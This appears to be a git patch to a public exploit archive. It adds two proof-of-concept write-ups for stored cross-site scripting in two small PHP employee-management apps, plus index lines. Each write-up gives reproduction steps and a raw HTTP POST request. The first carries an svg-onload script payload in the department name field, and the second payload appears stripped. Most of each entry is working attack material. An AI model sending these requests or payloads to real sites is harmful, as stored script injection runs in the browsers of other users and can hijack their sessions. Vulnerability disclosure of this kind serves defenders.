From c26eab756eaac17aef6a77298a52502d016903bb Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 11 Nov 2021 05:02:12 +0000 Subject: [PATCH] DB: 2021-11-11 2 changes to exploits/shellcodes Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS) Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) --- exploits/php/webapps/50506.txt | 36 ++++++++++++++++++++++++ exploits/php/webapps/50507.txt | 50 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 88 insertions(+) create mode 100644 exploits/php/webapps/50506.txt create mode 100644 exploits/php/webapps/50507.txt diff --git a/exploits/php/webapps/50506.txt b/exploits/php/webapps/50506.txt new file mode 100644 index 000000000..bac786b81 --- /dev/null +++ b/exploits/php/webapps/50506.txt @@ -0,0 +1,36 @@ +# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS) +# Date: 09/11/2021 +# Exploit Author: Ragavender A G +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip + +# Version: v1.0 + +# Tested on: Windows 10 + +*Exploit:* + +1. Navigate to the URL, http://localhost/edtms/edtms/admin/?page=maintenance +2. Add New department with the following value: + + - Name: ** + +3. Save the Department and refresh the page, which should trigger the payload. + +*PoC:* + +POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 49 +Origin: http://localhost +Connection: close +Referer: http://localhost/edtms/edtms/admin/?page=maintenance +Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3 + +id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1 \ No newline at end of file diff --git a/exploits/php/webapps/50507.txt b/exploits/php/webapps/50507.txt new file mode 100644 index 000000000..a6e91e478 --- /dev/null +++ b/exploits/php/webapps/50507.txt @@ -0,0 +1,50 @@ +# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS) +# Date: 10.11.2021 +# Exploit Author: İlhami Selamet +# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code +# Version: v1.0 +# Tested on: Kali Linux + XAMPP v8.0.12 + +Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. + +Step 1 - Login with admin account & navigate to 'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department +Step 1 - Click on the 'Create New' button for adding a new department. +Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - +Step 3 - Save the department. + +The stored XSS triggers for all users that navigate to the 'Department List' page. + +PoC + +POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888 +Content-Length: 555 +Origin: http://localhost +Connection: close +Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department +Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54 + +-----------------------------407760789114464123714007564888 +Content-Disposition: form-data; name="id" + + +-----------------------------407760789114464123714007564888 +Content-Disposition: form-data; name="name" + + +-----------------------------407760789114464123714007564888 +Content-Disposition: form-data; name="description" + +desc +-----------------------------407760789114464123714007564888 +Content-Disposition: form-data; name="status" + +1 +-----------------------------407760789114464123714007564888-- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 97d44682e..54c19dd63 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44604,3 +44604,5 @@ id,file,description,date,author,type,platform,port 50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php, 50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php, 50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php, +50506,exploits/php/webapps/50506.txt,"Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Ragavender A G",webapps,php, +50507,exploits/php/webapps/50507.txt,"Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)",1970-01-01,"İlhami Selamet",webapps,php,